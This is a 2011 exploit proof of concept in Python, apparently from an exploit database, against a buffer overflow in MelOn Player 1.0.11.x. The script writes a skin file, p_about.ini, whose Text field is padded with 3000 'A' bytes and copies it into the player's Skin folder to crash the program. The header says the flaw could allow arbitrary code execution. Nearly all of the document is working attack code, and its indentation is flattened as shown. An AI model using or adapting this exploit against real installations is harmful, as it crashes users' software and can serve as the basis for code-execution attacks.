# Exploit Title: MelOnPlayer 1.0.11.x Denial of Service POC
# Date: 09/09/2011
# Author: modpr0be
# Software Link: http://www.melon.co.id/cs/guide/download/player.do
# Vulnerable version: 1.0.11.x
# Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
# CVE : N/A
# Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner
#### Software description:
# Melon Player is a famous software in Indonesia to play songs that are provided by
# the Melon portal (http://www.melon.co.id). This software can play any music
# file types such as mp3, wav, wma, mp4, and others. This player can also play
# the files on your local computer or by online streaming to the portal Melon.
# The songs can also be downloaded to your local computer.
#
#### Vulnerable information:
# The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability
# when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file
# as part of skin template. This file will bring the program information and can be
# accessed on the menu (Menu → Information)), as a result of adding extra bytes to
# parts of the file (Text section), giving the attackers possibility to run an arbitrary
# code execution on the system that install Melon Player.
#
### Some Conditions:
# This is just the POC, it will just crash the program.
# and it's unicode ;)
#
##
#!/usr/bin/python
import os,sys,shutil,time
header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=
[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34
[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10
[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13
[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20
[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=
[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")
footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")
filename="p_about.ini"
splash=os.path.abspath(filename)
skindir="C:\Program Files\MelonPlayerID\Skin"
junk = "A" * 3000
buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170\r\n""")
banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy :)
=====================================================
""")
file=open(filename,'w')
if os.name == 'nt':
if os.path.isdir(skindir):
try:
file.write(header+buggy+footer)
print banner
print "[*] Creating the malicious .ini file.."
time.sleep(2)
print "[*] Malicious file (POC)",filename,"created.."
print "[*] Path:",splash
file.close()
shutil.copy2(splash,skindir)
print "[*] File",filename,"has been copied to",skindir
except IOError:
print "[-] Could not write to destination folder, check permission.."
sys.exit()
else:
print "[-] Could not find Skin directory, is MelOn Player installed?"
sys.exit()
else:
print "[-] Please run this script on Windows."
sys.exit()